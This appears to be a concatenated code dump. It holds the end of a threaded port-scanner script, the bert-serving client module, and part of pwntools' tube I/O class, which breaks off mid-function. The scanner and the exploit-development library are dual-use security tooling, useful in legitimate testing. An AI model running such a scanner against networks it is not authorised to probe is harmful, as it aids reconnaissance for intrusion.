print("|",end="")
else:
print("---",end="")
for i in cPorts:
print("{}|".format(i),end="")
try:
#check if ports are ok for scanning
if endPort < maxPort and startPort >= 0:
#create for every portcheck a thread
for port in range(startPort,endPort+1):
process = threading.Thread(target=check,name=port,args=[port])
process.start()
threads.append(process)
#close every thread after finishing the check
for process in threads:
process.join()
#Print the result of the check
if args.all:
printOpen()
printClosed()
elif len(oPorts) != 0:
printOpen()
else:
print("No host online or no open port in this port Range")
sys.exit()
#Port not in Range
else:
print("Port not in Range 0 - 65535")
sys.exit()
except KeyboardInterrupt:
print ("You pressed Ctrl+C")
sys.exit()
|
__init__.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Han Xiao <artex.xh@gmail.com> <https://hanxiao.github.io>
import sys
import threading
import time
import uuid
import warnings
from collections import namedtuple
from functools import wraps
import numpy as np
import zmq
from zmq.utils import jsonapi
__all__ = ['__version__', 'BertClient', 'ConcurrentBertClient']
# in the future client version must match with server version
__version__ = '1.9.2'
if sys.version_info >= (3, 0):
from ._py3_var import *
else:
from ._py2_var import *
_Response = namedtuple('_Response', ['id', 'content'])
Response = namedtuple('Response', ['id', 'embedding', 'tokens'])
class BertClient(object):
def __init__(self, ip='localhost', port=5555, port_out=5556,
output_fmt='ndarray', show_server_config=False,
identity=None, check_version=True, check_length=True,
check_token_info=True, ignore_all_checks=False,
timeout=-1):
""" A client object connected to a BertServer
Create a BertClient that connects to a BertServer.
Note, server must be ready at the moment you are calling this function.
If you are not sure whether the server is ready, then please set `ignore_all_checks=True`
You can also use it as a context manager:
.. highlight:: python
.. code-block:: python
with BertClient() as bc:
bc.encode(...)
# bc is automatically closed out of the context
:type timeout: int
:type check_version: bool
:type check_length: bool
:type check_token_info: bool
:type ignore_all_checks: bool
:type identity: str
:type show_server_config: bool
:type output_fmt: str
:type port_out: int
:type port: int
:type ip: str
:param ip: the ip address of the server
:param port: port for pushing data from client to server, must be consistent with the server side config
:param port_out: port for publishing results from server to client, must be consistent with the server side config
:param output_fmt: the output format of the sentence encodes, either in numpy array or python List[List[float]] (ndarray/list)
:param show_server_config: whether to show server configs when first connected
:param identity: the UUID of this client
:param check_version: check if server has the same version as client, raise AttributeError if not the same
:param check_length: check if server `max_seq_len` is less than the sentence length before sent
:param check_token_info: check if server can return tokenization
:param ignore_all_checks: ignore all checks, set it to True if you are not sure whether the server is ready when constructing BertClient()
:param timeout: set the timeout (milliseconds) for receive operation on the client, -1 means no timeout and wait until result returns
"""
self.context = zmq.Context()
self.sender = self.context.socket(zmq.PUSH)
self.sender.setsockopt(zmq.LINGER, 0)
self.identity = identity or str(uuid.uuid4()).encode('ascii')
self.sender.connect('tcp://%s:%d' % (ip, port))
self.receiver = self.context.socket(zmq.SUB)
self.receiver.setsockopt(zmq.LINGER, 0)
self.receiver.setsockopt(zmq.SUBSCRIBE, self.identity)
self.receiver.connect('tcp://%s:%d' % (ip, port_out))
self.request_id = 0
self.timeout = timeout
self.pending_request = set()
self.pending_response = {}
if output_fmt == 'ndarray':
self.formatter = lambda x: x
elif output_fmt == 'list':
self.formatter = lambda x: x.tolist()
else:
raise AttributeError('"output_fmt" must be "ndarray" or "list"')
self.output_fmt = output_fmt
self.port = port
self.port_out = port_out
self.ip = ip
self.length_limit = 0
self.token_info_available = False
if not ignore_all_checks and (check_version or show_server_config or check_length or check_token_info):
s_status = self.server_config
if check_version and s_status['server_version'] != self.status['client_version']:
raise AttributeError('version mismatch! server version is %s but client version is %s!\n'
'consider "pip install -U bert-serving-server bert-serving-client"\n'
'or disable version-check by "BertClient(check_version=False)"' % (
s_status['server_version'], self.status['client_version']))
if check_length:
if s_status['max_seq_len'] is not None:
self.length_limit = int(s_status['max_seq_len'])
else:
self.length_limit = None
if check_token_info:
self.token_info_available = bool(s_status['show_tokens_to_client'])
if show_server_config:
self._print_dict(s_status, 'server config:')
def close(self):
"""
Gently close all connections of the client. If you are using BertClient as context manager,
then this is not necessary.
"""
self.sender.close()
self.receiver.close()
self.context.term()
def _send(self, msg, msg_len=0):
self.request_id += 1
self.sender.send_multipart([self.identity, msg, b'%d' % self.request_id, b'%d' % msg_len])
self.pending_request.add(self.request_id)
return self.request_id
def _recv(self, wait_for_req_id=None):
try:
while True:
# a request has been returned and found in pending_response
if wait_for_req_id in self.pending_response:
response = self.pending_response.pop(wait_for_req_id)
return _Response(wait_for_req_id, response)
# receive a response
response = self.receiver.recv_multipart()
request_id = int(response[-1])
# if not wait for particular response then simply return
if not wait_for_req_id or (wait_for_req_id == request_id):
self.pending_request.remove(request_id)
return _Response(request_id, response)
elif wait_for_req_id != request_id:
self.pending_response[request_id] = response
# wait for the next response
except Exception as e:
raise e
finally:
if wait_for_req_id in self.pending_request:
self.pending_request.remove(wait_for_req_id)
def _recv_ndarray(self, wait_for_req_id=None):
request_id, response = self._recv(wait_for_req_id)
arr_info, arr_val = jsonapi.loads(response[1]), response[2]
X = np.frombuffer(_buffer(arr_val), dtype=str(arr_info['dtype']))
return Response(request_id, self.formatter(X.reshape(arr_info['shape'])), arr_info.get('tokens', ''))
@property
def status(self):
"""
Get the status of this BertClient instance
:rtype: dict[str, str]
:return: a dictionary contains the status of this BertClient instance
"""
return {
'identity': self.identity,
'num_request': self.request_id,
'num_pending_request': len(self.pending_request),
'pending_request': self.pending_request,
'output_fmt': self.output_fmt,
'port': self.port,
'port_out': self.port_out,
'server_ip': self.ip,
'client_version': __version__,
'timeout': self.timeout
}
def _timeout(func):
@wraps(func)
def arg_wrapper(self, *args, **kwargs):
if 'blocking' in kwargs and not kwargs['blocking']:
# override client timeout setting if `func` is called in non-blocking way
self.receiver.setsockopt(zmq.RCVTIMEO, -1)
else:
self.receiver.setsockopt(zmq.RCVTIMEO, self.timeout)
try:
return func(self, *args, **kwargs)
except zmq.error.Again as _e:
t_e = TimeoutError(
'no response from the server (with "timeout"=%d ms), please check the following:'
'is the server still online? is the network broken? are "port" and "port_out" correct? '
'are you encoding a huge amount of data whereas the timeout is too small for that?' % self.timeout)
if _py2:
raise t_e
else:
_raise(t_e, _e)
finally:
self.receiver.setsockopt(zmq.RCVTIMEO, -1)
return arg_wrapper
@property
@_timeout
def server_config(self):
"""
Get the current configuration of the server connected to this client
:return: a dictionary contains the current configuration of the server connected to this client
:rtype: dict[str, str]
"""
req_id = self._send(b'SHOW_CONFIG')
return jsonapi.loads(self._recv(req_id).content[1])
@property
@_timeout
def server_status(self):
"""
Get the current status of the server connected to this client
:return: a dictionary contains the current status of the server connected to this client
:rtype: dict[str, str]
"""
req_id = self._send(b'SHOW_STATUS')
return jsonapi.loads(self._recv(req_id).content[1])
@_timeout
def encode(self, texts, blocking=True, is_tokenized=False, show_tokens=False):
""" Encode a list of strings to a list of vectors
`texts` should be a list of strings, each of which represents a sentence.
If `is_tokenized` is set to True, then `texts` should be list[list[str]],
outer list represents sentence and inner list represent tokens in the sentence.
Note that if `blocking` is set to False, then you need to fetch the result manually afterwards.
.. highlight:: python
.. code-block:: python
with BertClient() as bc:
# encode untokenized sentences
bc.encode(['First do it',
'then do it right',
'then do it better'])
# encode tokenized sentences
bc.encode([['First', 'do', 'it'],
['then', 'do', 'it', 'right'],
['then', 'do', 'it', 'better']], is_tokenized=True)
:type is_tokenized: bool
:type show_tokens: bool
:type blocking: bool
:type timeout: bool
:type texts: list[str] or list[list[str]]
:param is_tokenized: whether the input texts is already tokenized
:param show_tokens: whether to include tokenization result from the server. If true, the return of the function will be a tuple
:param texts: list of sentence to be encoded. Larger list for better efficiency.
:param blocking: wait until the encoded result is returned from the server. If false, will immediately return.
:param timeout: throw a timeout error when the encoding takes longer than the predefined timeout.
:return: encoded sentence/token-level embeddings, rows correspond to sentences
:rtype: numpy.ndarray or list[list[float]]
"""
if is_tokenized:
self._check_input_lst_lst_str(texts)
else:
self._check_input_lst_str(texts)
if self.length_limit is None:
warnings.warn('server does not put a restriction on "max_seq_len", '
'it will determine "max_seq_len" dynamically according to the sequences in the batch. '
'you can restrict the sequence length on the client side for better efficiency')
elif self.length_limit and not self._check_length(texts, self.length_limit, is_tokenized):
warnings.warn('some of your sentences have more tokens than "max_seq_len=%d" set on the server, '
'as consequence you may get less-accurate or truncated embeddings.\n'
'here is what you can do:\n'
'- disable the length-check by create a new "BertClient(check_length=False)" '
'when you do not want to display this warning\n'
'- or, start a new server with a larger "max_seq_len"' % self.length_limit)
req_id = self._send(jsonapi.dumps(texts), len(texts))
if not blocking:
return None
r = self._recv_ndarray(req_id)
if self.token_info_available and show_tokens:
return r.embedding, r.tokens
elif not self.token_info_available and show_tokens:
warnings.warn('"show_tokens=True", but the server does not support showing tokenization info to clients.\n'
'here is what you can do:\n'
'- start a new server with "bert-serving-start -show_tokens_to_client ..."\n'
'- or, use "encode(show_tokens=False)"')
return r.embedding
def fetch(self, delay=.0):
""" Fetch the encoded vectors from server, use it with `encode(blocking=False)`
Use it after `encode(texts, blocking=False)`. If there is no pending requests, will return None.
Note that `fetch()` does not preserve the order of the requests! Say you have two non-blocking requests,
R1 and R2, where R1 with 256 samples, R2 with 1 samples. It could be that R2 returns first.
To fetch all results in the original sending order, please use `fetch_all(sort=True)`
:type delay: float
:param delay: delay in seconds and then run fetcher
:return: a generator that yields request id and encoded vector in a tuple, where the request id can be used to determine the order
:rtype: Iterator[tuple(int, numpy.ndarray)]
"""
time.sleep(delay)
while self.pending_request:
yield self._recv_ndarray()
def fetch_all(self, sort=True, concat=False):
""" Fetch all encoded vectors from server, use it with `encode(blocking=False)`
Use it `encode(texts, blocking=False)`. If there is no pending requests, it will return None.
:type sort: bool
:type concat: bool
:param sort: sort results by their request ids. It should be True if you want to preserve the sending order
:param concat: concatenate all results into one ndarray
:return: encoded sentence/token-level embeddings in sending order
:rtype: numpy.ndarray or list[list[float]]
"""
if self.pending_request:
tmp = list(self.fetch())
if sort:
tmp = sorted(tmp, key=lambda v: v.id)
tmp = [v.embedding for v in tmp]
if concat:
if self.output_fmt == 'ndarray':
tmp = np.concatenate(tmp, axis=0)
elif self.output_fmt == 'list':
tmp = [vv for v in tmp for vv in v]
return tmp
def encode_async(self, batch_generator, max_num_batch=None, delay=0.1, **kwargs):
""" Async encode batches from a generator
:param delay: delay in seconds and then run fetcher
:param batch_generator: a generator that yields list[str] or list[list[str]] (for `is_tokenized=True`) every time
:param max_num_batch: stop after encoding this number of batches
:param `**kwargs`: the rest parameters please refer to `encode()`
:return: a generator that yields encoded vectors in ndarray, where the request id can be used to determine the order
:rtype: Iterator[tuple(int, numpy.ndarray)]
"""
def run():
cnt = 0
for texts in batch_generator:
self.encode(texts, blocking=False, **kwargs)
cnt += 1
if max_num_batch and cnt == max_num_batch:
break
t = threading.Thread(target=run)
t.start()
return self.fetch(delay)
@staticmethod
def _check_length(texts, len_limit, tokenized):
if tokenized:
# texts is already tokenized as list of str
return all(len(t) <= len_limit for t in texts)
else:
# do a simple whitespace tokenizer
return all(len(t.split()) <= len_limit for t in texts)
@staticmethod
def _check_input_lst_str(texts):
if not isinstance(texts, list):
raise TypeError('"%s" must be %s, but received %s' % (texts, type([]), type(texts)))
if not len(texts):
raise ValueError(
'"%s" must be a non-empty list, but received %s with %d elements' % (texts, type(texts), len(texts)))
for idx, s in enumerate(texts):
if not isinstance(s, _str):
raise TypeError('all elements in the list must be %s, but element %d is %s' % (type(''), idx, type(s)))
if not s.strip():
raise ValueError(
'all elements in the list must be non-empty string, but element %d is %s' % (idx, repr(s)))
if _py2:
texts[idx] = _unicode(texts[idx])
@staticmethod
def _check_input_lst_lst_str(texts):
if not isinstance(texts, list):
raise TypeError('"texts" must be %s, but received %s' % (type([]), type(texts)))
if not len(texts):
raise ValueError(
'"texts" must be a non-empty list, but received %s with %d elements' % (type(texts), len(texts)))
for s in texts:
BertClient._check_input_lst_str(s)
@staticmethod
def _print_dict(x, title=None):
if title:
print(title)
for k, v in x.items():
print('%30s\t=\t%-30s' % (k, v))
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
class BCManager():
def __init__(self, available_bc):
self.available_bc = available_bc
self.bc = None
def __enter__(self):
self.bc = self.available_bc.pop()
return self.bc
def __exit__(self, *args):
self.available_bc.append(self.bc)
class ConcurrentBertClient(BertClient):
def __init__(self, max_concurrency=10, **kwargs):
""" A thread-safe client object connected to a BertServer
Create a BertClient that connects to a BertServer.
Note, server must be ready at the moment you are calling this function.
If you are not sure whether the server is ready, then please set `check_version=False` and `check_length=False`
:type max_concurrency: int
:param max_concurrency: the maximum number of concurrent connections allowed
"""
try:
from bert_serving.client import BertClient
except ImportError:
raise ImportError('BertClient module is not available, it is required for serving HTTP requests.'
'Please use "pip install -U bert-serving-client" to install it.'
'If you do not want to use it as an HTTP server, '
'then remove "-http_port" from the command line.')
self.available_bc = [BertClient(**kwargs) for _ in range(max_concurrency)]
self.max_concurrency = max_concurrency
def close(self):
for bc in self.available_bc:
bc.close()
def _concurrent(func):
@wraps(func)
def arg_wrapper(self, *args, **kwargs):
try:
with BCManager(self.available_bc) as bc:
f = getattr(bc, func.__name__)
r = f if isinstance(f, dict) else f(*args, **kwargs)
return r
except IndexError:
raise RuntimeError('Too many concurrent connections!'
'Try to increase the value of "max_concurrency", '
'currently =%d' % self.max_concurrency)
return arg_wrapper
@_concurrent
def encode(self, **kwargs):
pass
@property
@_concurrent
def server_config(self):
pass
@property
@_concurrent
def server_status(self):
pass
@property
@_concurrent
def status(self):
pass
def fetch(self, **kwargs):
raise NotImplementedError('Async encoding of "ConcurrentBertClient" is not implemented yet')
def fetch_all(self, **kwargs):
raise NotImplementedError('Async encoding of "ConcurrentBertClient" is not implemented yet')
def encode_async(self, **kwargs):
raise NotImplementedError('Async encoding of "ConcurrentBertClient" is not implemented yet')
|
tube.py
|
# -*- coding: utf-8 -*-
import logging
import re
import string
import subprocess
import sys
import threading
import time
from .. import atexit
from .. import term
from ..context import context
from ..log import Logger
from ..timeout import Timeout
from ..util import fiddling
from ..util import misc
from ..util import packing
from .buffer import Buffer
class tube(Timeout, Logger):
"""
Container of all the tube functions common to sockets, TTYs and SSH connetions.
"""
default = Timeout.default
forever = Timeout.forever
#: Delimiter to use for :meth:`sendline`, :meth:`recvline`,
#: and related functions.
newline = '\n'
def __init__(self, timeout = default, level = None):
super(tube, self).__init__(timeout)
Logger.__init__(self, None)
if level is not None:
self.setLevel(level)
self.buffer = Buffer()
atexit.register(self.close)
# Functions based on functions from subclasses
def recv(self, numb = 4096, timeout = default):
r"""recv(numb = 4096, timeout = default) -> str
Receives up to `numb` bytes of data from the tube, and returns
as soon as any quantity of data is available.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Raises:
exceptions.EOFError: The connection is closed
Returns:
A string containing bytes received from the socket,
or ``''`` if a timeout occurred while waiting.
Examples:
>>> t = tube()
>>> # Fake a data source
>>> t.recv_raw = lambda n: 'Hello, world'
>>> t.recv() == 'Hello, world'
True
>>> t.unrecv('Woohoo')
>>> t.recv() == 'Woohoo'
True
>>> with context.local(log_level='debug'):
... _ = t.recv() # doctest: +ELLIPSIS
[...] Received 0xc bytes:
'Hello, world'
"""
return self._recv(numb, timeout) or ''
def unrecv(self, data):
"""unrecv(data)
Puts the specified data back at the beginning of the receive
buffer.
Examples:
.. doctest::
>>> t = tube()
>>> t.recv_raw = lambda n: 'hello'
>>> t.recv()
'hello'
>>> t.recv()
'hello'
>>> t.unrecv('world')
>>> t.recv()
'world'
>>> t.recv()
'hello'
"""
self.buffer.unget(data)
def _fillbuffer(self, timeout = default):
"""_fillbuffer(timeout = default)
Fills the internal buffer from the pipe, by calling
:meth:`recv_raw` exactly once.
Returns:
The bytes of data received, or ``''`` if no data was received.
Examples:
>>> t = tube()
>>> t.recv_raw = lambda *a: 'abc'
>>> len(t.buffer)
0
>>> t._fillbuffer()
'abc'
>>> len(t.buffer)
3
"""
data = ''
with self.local(timeout):
data = self.recv_raw(4096)
if data and self.isEnabledFor(logging.DEBUG):
self.debug('Received %#x bytes:' % len(data))
if all(c in string.printable for c in data):
for line in data.splitlines(True):
self.indented(repr(line), level = logging.DEBUG)
else:
self.indented(fiddling.hexdump(data), level = logging.DEBUG)
if data:
self.buffer.add(data)
return data
def _recv(self, numb = 4096, timeout = default):
"""_recv(numb = 4096, timeout = default) -> str
Recieves one chunk of from the internal buffer or from the OS if the
buffer is empty.
"""
data = ''
# No buffered data, could not put anything in the buffer
# before timeout.
if not self.buffer and not self._fillbuffer(timeout):
return ''
return self.buffer.get(numb)
def recvpred(self, pred, timeout = default):
"""recvpred(pred, timeout = default) -> str
Receives one byte at a time from the tube, until ``pred(bytes)``
evaluates to True.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Arguments:
pred(callable): Function to call, with the currently-accumulated data.
timeout(int): Timeout for the operation
Raises:
exceptions.EOFError: The connection is closed
Returns:
A string containing bytes received from the socket,
or ``''`` if a timeout occurred while waiting.
"""
data = ''
with self.countdown(timeout):
while not pred(data):
try:
res = self.recv(1)
except Exception:
self.unrecv(data)
return ''
if res:
data += res
else:
self.unrecv(data)
return ''
return data
def recvn(self, numb, timeout = default):
"""recvn(numb, timeout = default) -> str
Recieves exactly `n` bytes.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Raises:
exceptions.EOFError: The connection closed before the request could be satisfied
Returns:
A string containing bytes received from the socket,
or ``''`` if a timeout occurred while waiting.
Examples:
.. doctest::
>>> t = tube()
>>> data = 'hello world'
>>> t.recv_raw = lambda *a: data
>>> t.recvn(len(data)) == data
True
>>> t.recvn(len(data)+1) == data + data[0]
True
>>> t.recv_raw = lambda *a: None
>>> # The remaining data is buffered
>>> t.recv() == data[1:]
True
>>> t.recv_raw = lambda *a: time.sleep(0.01) or 'a'
>>> t.recvn(10, timeout=0.05)
''
>>> t.recvn(10, timeout=0.05)
'aaaaaaaaaa'
"""
# Keep track of how much data has been received
# It will be pasted together at the end if a
# timeout does not occur, or put into the tube buffer.
with self.countdown(timeout):
while self.countdown_active() and len(self.buffer) < numb and self._fillbuffer(self.timeout):
pass
if len(self.buffer) < numb:
return ''
return self.buffer.get(numb)
def recvuntil(self, delims, drop=False, timeout = default):
"""recvuntil(delims, timeout = default) -> str
Recieve data until one of `delims` is encountered.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
arguments:
delims(str,tuple): String of delimiters characters, or list of delimiter strings.
drop(bool): Drop the ending. If ``True`` it is removed from the end of the return value.
Raises:
exceptions.EOFError: The connection closed before the request could be satisfied
Returns:
A string containing bytes received from the socket,
or ``''`` if a timeout occurred while waiting.
Examples:
.. doctest::
>>> t = tube()
>>> t.recv_raw = lambda n: "Hello World!"
>>> t.recvuntil(' ')
'Hello '
>>> _=t.clean(0)
>>> # Matches on 'o' in 'Hello'
>>> t.recvuntil(tuple(' Wor'))
'Hello'
>>> _=t.clean(0)
>>> # Matches expressly full string
>>> t.recvuntil(' Wor')
'Hello Wor'
>>> _=t.clean(0)
>>> # Matches on full string, drops match
>>> t.recvuntil(' Wor', drop=True)
'Hello'
>>> # Try with regex special characters
>>> t = tube()
>>> t.recv_raw = lambda n: "Hello|World"
>>> t.recvuntil('|', drop=True)
'Hello'
"""
# Convert string into singleton tupple
if isinstance(delims, (str, unicode)):
delims = (delims,)
# Longest delimiter for tracking purposes
longest = max(map(len, delims))
# Cumulative data to search
data = []
top = ''
with self.countdown(timeout):
while self.countdown_active():
try:
res = self.recv(timeout=self.timeout)
except Exception:
self.unrecv(''.join(data) + top)
raise
if not res:
self.unrecv(''.join(data) + top)
return ''
top += res
start = len(top)
for d in delims:
j = top.find(d)
if start > j > -1:
start = j
end = j + len(d)
if start < len(top):
self.unrecv(top[end:])
if drop:
top = top[:start]
else:
top = top[:end]
return ''.join(data) + top
if len(top) > longest:
i = -longest - 1
data.append(top[:i])
top = top[i:]
return ''
def recvlines(self, numlines=2**20, keepends = False, timeout = default):
r"""recvlines(numlines, keepends = False, timeout = default) -> str list
Recieve up to ``numlines`` lines.
A "line" is any sequence of bytes terminated by the byte sequence
set by :attr:`newline`, which defaults to ``'\n'``.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Arguments:
numlines(int): Maximum number of lines to receive
keepends(bool): Keep newlines at the end of each line (``False``).
timeout(int): Maximum timeout
Raises:
exceptions.EOFError: The connection closed before the request could be satisfied
Returns:
A string containing bytes received from the socket,
or ``''`` if a timeout occurred while waiting.
Examples:
.. doctest::
>>> t = tube()
>>> t.recv_raw = lambda n: '\n'
>>> t.recvlines(3)
['', '', '']
>>> t.recv_raw = lambda n: 'Foo\nBar\nBaz\n'
>>> t.recvlines(3)
['Foo', 'Bar', 'Baz']
>>> t.recvlines(3, True)
['Foo\n', 'Bar\n', 'Baz\n']
"""
lines = []
with self.countdown(timeout):
for _ in xrange(numlines):
try:
# We must set 'keepends' to True here so that we can
# restore the original, unmodified data to the buffer
# in the event of a timeout.
res = self.recvline(keepends=True, timeout=timeout)
except Exception:
self.unrecv(''.join(lines))
raise
if res:
lines.append(res)
else:
break
if not keepends:
lines = [line.rstrip(self.newline) for line in lines]
return lines
def recvline(self, keepends = True, timeout = default):
r"""recvline(keepends = True) -> str
Receive a single line from the tube.
A "line" is any sequence of bytes terminated by the byte sequence
set in :attr:`newline`, which defaults to ``'\n'``.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Arguments:
keepends(bool): Keep the line ending (``True``).
timeout(int): Timeout
Return:
All bytes received over the tube until the first
newline ``'\n'`` is received. Optionally retains
the ending.
Examples:
>>> t = tube()
>>> t.recv_raw = lambda n: 'Foo\nBar\r\nBaz\n'
>>> t.recvline()
'Foo\n'
>>> t.recvline()
'Bar\r\n'
>>> t.recvline(keepends = False)
'Baz'
>>> t.newline = '\r\n'
>>> t.recvline(keepends = False)
'Foo\nBar'
"""
return self.recvuntil(self.newline, drop = not keepends, timeout = timeout)
def recvline_pred(self, pred, keepends = False, timeout = default):
r"""recvline_pred(pred, keepends = False) -> str
Receive data until ``pred(line)`` returns a truthy value.
Drop all other data.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Arguments:
pred(callable): Function to call. Returns the line for which
this function returns ``True``.
Examples:
.. doctest::
>>> t = tube()
>>> t.recv_raw = lambda n: "Foo\nBar\nBaz\n"
>>> t.recvline_pred(lambda line: line == "Bar\n")
'Bar'
>>> t.recvline_pred(lambda line: line == "Bar\n", keepends=True)
'Bar\n'
>>> t.recvline_pred(lambda line: line == 'Nope!', timeout=0.1)
''
"""
tmpbuf = Buffer()
line = ''
with self.countdown(timeout):
while self.countdown_active():
try:
line = self.recvline(keepends=True)
except Exception:
self.buffer.add(tmpbuf)
raise
if not line:
self.buffer.add(tmpbuf)
return ''
if pred(line):
if not keepends:
line = line[:-len(self.newline)]
return line
else:
tmpbuf.add(line)
return ''
def recvline_contains(self, items, keepends = False, timeout = default):
r"""
Receive lines until one line is found which contains at least
one of `items`.
Arguments:
items(str,tuple): List of strings to search for, or a single string.
keepends(bool): Return lines with newlines if ``True``
timeout(int): Timeout, in seconds
Examples:
>>> t = tube()
>>> t.recv_raw = lambda n: "Hello\nWorld\nXylophone\n"
>>> t.recvline_contains('r')
'World'
>>> f = lambda n: "cat dog bird\napple pear orange\nbicycle car train\n"
>>> t = tube()
>>> t.recv_raw = f
>>> t.recvline_contains('pear')
'apple pear orange'
>>> t = tube()
>>> t.recv_raw = f
>>> t.recvline_contains(('car', 'train'))
'bicycle car train'
"""
if isinstance(items, (str,unicode)):
items = (items,)
def pred(line):
return any(d in line for d in items)
return self.recvline_pred(pred, keepends, timeout)
def recvline_startswith(self, delims, keepends = False, timeout = default):
r"""recvline_startswith(delims, keepends = False, timeout = default) -> str
Keep recieving lines until one is found that starts with one of
`delims`. Returns the last line recieved.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Arguments:
delims(str,tuple): List of strings to search for, or string of single characters
keepends(bool): Return lines with newlines if ``True``
timeout(int): Timeout, in seconds
Returns:
The first line received which starts with a delimiter in ``delims``.
Examples:
.. doctest::
>>> t = tube()
>>> t.recv_raw = lambda n: "Hello\nWorld\nXylophone\n"
>>> t.recvline_startswith(tuple('WXYZ'))
'World'
>>> t.recvline_startswith(tuple('WXYZ'), True)
'Xylophone\n'
>>> t.recvline_startswith('Wo')
'World'
"""
# Convert string into singleton tupple
if isinstance(delims, (str, unicode)):
delims = (delims,)
return self.recvline_pred(lambda line: any(map(line.startswith, delims)),
keepends=keepends,
timeout=timeout)
def recvline_endswith(self, delims, keepends = False, timeout = default):
r"""recvline_endswith(delims, keepends = False, timeout = default) -> str
Keep recieving lines until one is found that starts with one of
`delims`. Returns the last line recieved.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
See :meth:`recvline_startswith` for more details.
Examples:
.. doctest::
>>> t = tube()
>>> t.recv_raw = lambda n: 'Foo\nBar\nBaz\nKaboodle\n'
>>> t.recvline_endswith('r')
'Bar'
>>> t.recvline_endswith(tuple('abcde'), True)
'Kaboodle\n'
>>> t.recvline_endswith('oodle')
'Kaboodle'
"""
# Convert string into singleton tupple
if isinstance(delims, (str, unicode)):
delims = (delims,)
delims = tuple(delim + self.newline for delim in delims)
return self.recvline_pred(lambda line: any(map(line.endswith, delims)),
keepends=keepends,
timeout=timeout)
def recvregex(self, regex, exact = False, timeout = default):
"""recvregex(regex, exact = False, timeout = default) -> str
Wrapper around :func:`recvpred`, which will return when a regex
matches the string in the buffer.
By default :func:`re.RegexObject.search` is used, but if `exact` is
set to True, then :func:`re.RegexObject.match` will be used instead.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
"""
if isinstance(regex, (str, unicode)):
regex = re.compile(regex)
if exact:
pred = regex.match
else:
pred = regex.search
return self.recvpred(pred, timeout = timeout)
def recvline_regex(self, regex, exact = False, keepends = False, timeout = default):
"""recvregex(regex, exact = False, keepends = False, timeout = default) -> str
Wrapper around :func:`recvline_pred`, which will return when a regex
matches a line.
By default :func:`re.RegexObject.search` is used, but if `exact` is
set to True, then :func:`re.RegexObject.match` will be used instead.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
"""
if isinstance(regex, (str, unicode)):
regex = re.compile(regex)
if exact:
pred = regex.match
else:
pred = regex.search
return self.recvline_pred(pred, keepends = keepends, timeout = timeout)
def recvrepeat(self, timeout = default):
"""recvrepeat()
Receives data until a timeout or EOF is reached.
Examples:
>>> data = [
... 'd',
... '', # simulate timeout
... 'c',
... 'b',
... 'a',
... ]
>>> def delayrecv(n, data=data):
... return data.pop()
>>> t = tube()
>>> t.recv_raw = delayrecv
>>> t.recvrepeat(0.2)
'abc'
>>> t.recv()
'd'
"""
try:
while self._fillbuffer(timeout=timeout):
pass
except EOFError:
pass
return self.buffer.get()
def recvall(self, timeout=Timeout.forever):
"""recvall() -> str
Receives data until EOF is reached.
"""
with self.waitfor('Recieving all data') as h:
l = len(self.buffer)
with self.local(timeout):
try:
while True:
l = misc.size(len(self.buffer))
h.status(l)
if not self._fillbuffer():
break
except EOFError:
pass
h.success("Done (%s)" % l)
self.close()
return self.buffer.get()
def send(self, data):
"""send(data)
Sends data.
If log level ``DEBUG`` is enabled, also prints out the data
received.
If it is not possible to send anymore because of a closed
connection, it raises ``exceptions.EOFError``
Examples:
>>> def p(x): print repr(x)
>>> t = tube()
>>> t.send_raw = p
>>> t.send('hello')
'hello'
"""
if self.isEnabledFor(logging.DEBUG):
self.debug('Sent %#x bytes:' % len(data))
if all(c in string.printable for c in data):
for line in data.splitlines(True):
self.indented(repr(line), level = logging.DEBUG)
else:
self.indented(fiddling.hexdump(data), level = logging.DEBUG)
self.send_raw(data)
def sendline(self, line=''):
r"""sendline(data)
Shorthand for ``t.send(data + t.newline)``.
Examples:
>>> def p(x): print repr(x)
>>> t = tube()
>>> t.send_raw = p
>>> t.sendline('hello')
'hello\n'
>>> t.newline = '\r\n'
>>> t.sendline('hello')
'hello\r\n'
"""
self.send(line + self.newline)
def sendafter(self, delim, data, timeout = default):
"""sendafter(delim, data, timeout = default) -> str
A combination of ``recvuntil(delim, timeout)`` and ``send(data)``.
"""
res = self.recvuntil(delim, timeout)
self.send(data)
return res
def sendlineafter(self, delim, data, timeout = default):
"""sendlineafter(delim, data, timeout = default) -> str
A combination of ``recvuntil(delim, timeout)`` and ``sendline(data)``."""
res = self.recvuntil(delim, timeout)
self.sendline(data)
return res
def sendthen(self, delim, data, timeout = default):
"""sendthen(delim, data, timeout = default) -> str
A combination of ``send(data)`` and ``recvuntil(delim, timeout)``."""
self.send(data)
return self.recvuntil(delim, timeout)
def sendlinethen(self, delim, data, timeout = default):
"""sendlinethen(delim, data, timeout = default) -> str
A combination of ``sendline(data)`` and ``recvuntil(delim, timeout)``."""
self.send(data + self.newline)
return self.recvuntil(delim, timeout)
def interactive(self, prompt = term.text.bold_red('$') + ' '):
"""interactive(prompt = pwnlib.term.text.bold_red('$') + ' ')
Does simultaneous reading and writing to the tube. In principle this just
connects the tube to standard in and standard out, but in practice this
is much more usable, since we are using :mod:`pwnlib.term` to print a
floating prompt.
Thus it only works in while in :data:`pwnlib.term.term_mode`.
"""
self.info('Switching to interactive mode')
go = threading.Event()
def recv_thread():
while not go.isSet():
try:
cur = self.recv(timeout = 0.05)
if cur:
sys.stderr.write(cur)
sys.stderr.flush()
except EOFError:
self.info('Got EOF while reading in interactive')
break
t = context.Thread(target = recv_thread)
t.daemon = True
t.start()
try:
while not go.isSet():
if term.term_mode:
